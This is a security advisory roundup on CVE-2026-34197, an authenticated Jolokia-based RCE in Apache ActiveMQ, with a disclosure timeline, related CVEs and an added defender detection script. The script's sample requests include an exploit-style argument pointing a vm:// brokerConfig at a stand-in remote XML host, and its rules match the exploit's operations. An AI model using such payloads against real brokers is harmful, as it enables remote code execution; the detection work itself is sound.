Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed CVE-2026-34197, an important-severity remote code execution flaw in Apache ActiveMQ Broker and Apache ActiveMQ Classic that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at /api/jolokia/. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, allowing attackers to call methods such as BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String) with a crafted discovery URI.
The exploit abuses the VM transport brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext; because Spring may instantiate singleton beans before ActiveMQ validates the configuration, this yields arbitrary code execution in the broker JVM, including through methods like Runtime.exec(). Apache said the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 before 6.2.3 in the 6.x line, and recommends upgrading to 5.19.5 or 6.2.3; the vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
Timeline
Apr 23, 2026
Apache discloses CVE-2026-41044 in ActiveMQ Jolokia DestinationView MBean
Apache disclosed CVE-2026-41044, an important-severity authenticated remote code execution flaw in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All. The issue lets an authenticated attacker craft a malicious broker name through the admin console and abuse the DestinationView MBean exposed by Jolokia to load a remote Spring XML context; Apache said affected versions should be upgraded to 5.19.6 or 6.2.5.
Apr 23, 2026
Apache discloses CVE-2026-40466 as bypass of ActiveMQ Jolokia RCE fix
Apache disclosed CVE-2026-40466, an important-severity vulnerability that can bypass the CVE-2026-34197 fix in Apache ActiveMQ when the activemq-http module is present. The flaw lets an authenticated attacker use HTTP Discovery transport to reach a malicious endpoint that returns a VM URI and ultimately load a remote Spring XML context for code execution; Apache advised upgrading to versions 5.19.6 or 6.2.5.
Apr 21, 2026
Shadowserver says 6,400 exposed ActiveMQ servers remain vulnerable
Shadowserver reported that more than 6,400 internet-exposed Apache ActiveMQ servers were still vulnerable to CVE-2026-34197 amid ongoing exploitation. It said the largest concentrations of exposed systems were in Asia, North America, and Europe, highlighting the scale of potential exposure.
Apr 17, 2026
CISA orders federal agencies to patch ActiveMQ flaw by April 30
After adding CVE-2026-34197 to the KEV catalog, CISA directed Federal Civilian Executive Branch agencies to remediate the Apache ActiveMQ vulnerability under Binding Operational Directive 22-01. The deadline for federal agencies to apply fixes or mitigations was set for 2026-04-30.
Apr 17, 2026
CISA adds ActiveMQ CVE-2026-34197 to KEV amid active exploitation
CISA added CVE-2026-34197 to its Known Exploited Vulnerabilities catalog and warned that the Apache ActiveMQ flaw is being actively exploited in the wild. The update elevated the issue from a disclosed and analyzed vulnerability to one with confirmed real-world exploitation.
Apr 7, 2026
Horizon3.ai publishes exploit details for ActiveMQ Jolokia RCE
Horizon3.ai released technical analysis of CVE-2026-34197, explaining exploitation via Jolokia's addNetworkConnector(String) to load a remote Spring XML file through vm:// and brokerConfig URLs. The post also noted that on ActiveMQ 6.0.0 through 6.1.1, chaining with CVE-2024-32114 can make the flaw effectively unauthenticated, and provided defender monitoring guidance for suspicious vm:// and brokerConfig=xbean:http activity.
Apr 6, 2026
Apache publishes remediation guidance for affected ActiveMQ versions
Apache stated the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 before 6.2.3 in the 6.x line. It advised users to upgrade to versions 5.19.5 or 6.2.3 to remediate the vulnerability.
Apr 6, 2026
Apache discloses CVE-2026-34197 affecting ActiveMQ Broker and Classic
Apache disclosed an important-severity vulnerability, CVE-2026-34197, in Apache ActiveMQ Broker and Apache ActiveMQ Classic. The flaw allows authenticated users to achieve code execution via Jolokia JMX-HTTP operations such as BrokerService.addNetworkConnector(String) and addConnector(String).
Apr 6, 2026
Horizon3.ai researcher reports ActiveMQ Jolokia RCE to Apache
Apache said CVE-2026-34197 was reported by Naveen Sunkavally of Horizon3.ai. The report concerned an authenticated remote code execution path through Jolokia-exposed ActiveMQ MBeans.
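A defender-side check for the Jolokia exec path described in the summary and in Horizon3.ai's monitoring guidance above, added here as an example (it is not code from Apache, Horizon3.ai or the page). It scans Jolokia JSON request bodies for exec calls on the ActiveMQ Broker MBean that invoke addNetworkConnector or addConnector, and rates any argument carrying a vm: URI with brokerConfig= or xbean: as high; the sample request lines, broker name and URIs are constructed, and the severity labels are this example's own.

```python
import json
import re
from urllib.parse import unquote

# Constructed sample: Jolokia POST bodies as a reverse proxy or broker access log
# might record them, one JSON document per line (single request or bulk array).
SAMPLE_REQUESTS = [
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"attribute":"TotalMessageCount"}',
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["vm://evil?brokerConfig=xbean:http://example.invalid/ctx.xml"]}',
    '[{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector","arguments":["tcp://0.0.0.0:61617"]}]',
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"gc"}',
]

# Operations named in the advisory; the Broker MBean is the target in both CVEs.
SENSITIVE_OPS = ("addNetworkConnector", "addConnector")
BROKER_MBEAN = re.compile(r"^org\.apache\.activemq:.*\btype=Broker\b")


def classify(request: dict) -> str:
    """Return 'high', 'review' or 'ok' for one Jolokia request object."""
    if request.get("type") != "exec":
        return "ok"
    if not BROKER_MBEAN.search(request.get("mbean", "")):
        return "ok"
    # Jolokia accepts "op" or "op(signature)"; compare the bare name.
    op = request.get("operation", "").split("(")[0]
    if op not in SENSITIVE_OPS:
        return "ok"
    args = " ".join(unquote(str(a)) for a in request.get("arguments", [])).lower()
    if "vm:" in args and ("brokerconfig=" in args or "xbean:" in args):
        return "high"
    # Any other connector addition still merits review: the CVE-2026-40466 bypass
    # hides the vm: URI behind an HTTP discovery endpoint, so the argument alone
    # does not reveal the final transport.
    return "review"


def scan(lines):
    """Yield (line_no, verdict, operation) for every request that is not 'ok'."""
    findings = []
    for n, line in enumerate(lines, 1):
        doc = json.loads(line)
        for req in (doc if isinstance(doc, list) else [doc]):
            verdict = classify(req)
            if verdict != "ok":
                findings.append((n, verdict, req.get("operation")))
    return findings
```

This covers the JSON POST form only; Jolokia's GET form encodes the same exec call in the URL path, so a full detection also has to decode that path before applying the same rules.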
Related Stories

Apache ActiveMQ Flaws Enable Path Traversal and TLS DoS
Apache disclosed two vulnerabilities affecting multiple **ActiveMQ** components, including Client, Broker, and bundled distributions. **CVE-2026-33227** is a low-severity pathname restriction flaw that lets an authenticated user manipulate a supplied `key` value to traverse the classpath in two cases: when creating a **STOMP** consumer and when browsing messages through the web console. Apache warned the issue could expose classpath resource loading and potentially be chained with another attack. The flaw affects the 5.x branch before **5.19.3** and the 6.x branch from **6.0.0** before **6.2.2**, but Apache said those initial fixes were incomplete on Windows because of path separator handling, and recommended upgrading instead to **5.19.4** or **6.2.3**. Apache also published **CVE-2026-39304**, an important denial-of-service flaw in ActiveMQ's **NIO SSL transports** caused by incorrect handling of **TLS 1.3 `KeyUpdate`** messages. A client can repeatedly trigger updates and exhaust broker memory in the SSL engine, causing out-of-memory crashes and service disruption. Apache added that related handshake handling is also broken for earlier TLS versions such as **TLS 1.2**, though those cases lead to hung connections rather than memory exhaustion. The DoS issue affects the 5.x branch before **5.19.4** and the 6.x branch from **6.0.0** before **6.2.4**; users are advised to upgrade to **5.19.5** or **6.2.4**.
3 weeks ago
Critical RCE Vulnerability in Apache ActiveMQ NMS AMQP Client
A critical remote code execution (RCE) vulnerability, identified as CVE-2025-54539, has been discovered in the Apache ActiveMQ NMS AMQP Client. This flaw is rated with a CVSS 3.1 score of 9.8, indicating its severe impact and ease of exploitation. The vulnerability arises from the deserialization of untrusted data within the NMS AMQP Client component, which can allow attackers to execute arbitrary code on the server. Security researchers have confirmed that successful exploitation of this vulnerability could lead to full server-side code execution, potentially granting attackers complete control over affected systems.

The issue specifically affects deployments using the NMS AMQP Client, a component commonly integrated into enterprise messaging infrastructures. Organizations relying on Apache ActiveMQ for message brokering are at heightened risk if they utilize the vulnerable client library. The vulnerability can be exploited remotely, requiring no prior authentication, which significantly increases the attack surface and urgency for remediation. Security advisories recommend immediate patching or mitigation to prevent exploitation in the wild.

The flaw was publicly disclosed on October 16, 2025, prompting rapid response from the Apache ActiveMQ development team and the broader security community. No reports of active exploitation have been confirmed at the time of disclosure, but the critical nature of the bug has led to widespread concern among enterprise users. Technical analysis indicates that the vulnerability stems from improper handling of serialized objects received over the AMQP protocol. Attackers can craft malicious payloads that, when processed by the vulnerable client, trigger arbitrary code execution. The Apache Software Foundation has released updated versions of the NMS AMQP Client to address the issue and urges all users to upgrade immediately.

Security experts highlight the importance of reviewing all systems for the presence of the affected library and applying compensating controls where patching is not immediately feasible. The vulnerability underscores the ongoing risks associated with deserialization flaws in widely used open-source components. Organizations are advised to monitor for indicators of compromise and to review their application architectures for similar risks. The incident serves as a reminder of the critical need for secure coding practices and regular vulnerability management in enterprise environments.
1 month ago
Apache ActiveMQ and Artemis Flaws Enable Security Bypass and Multiple Attacks
German authorities issued advisories for **Apache ActiveMQ Artemis** and **Apache ActiveMQ Classic** components after disclosing vulnerabilities that affect the broker, client, and web interfaces. One advisory warns that a flaw in **Apache ActiveMQ Artemis** can allow attackers to **bypass security measures**, raising the risk of unauthorized access or actions within affected messaging environments. A separate advisory reports **multiple vulnerabilities** in **Apache ActiveMQ** across the **Client, Broker, and Web** components, indicating broader exposure for organizations using the messaging platform in enterprise integrations and application back ends. The notices identify the affected Apache messaging products as requiring prompt review and remediation to reduce the risk of compromise in systems that rely on ActiveMQ services.
1 week ago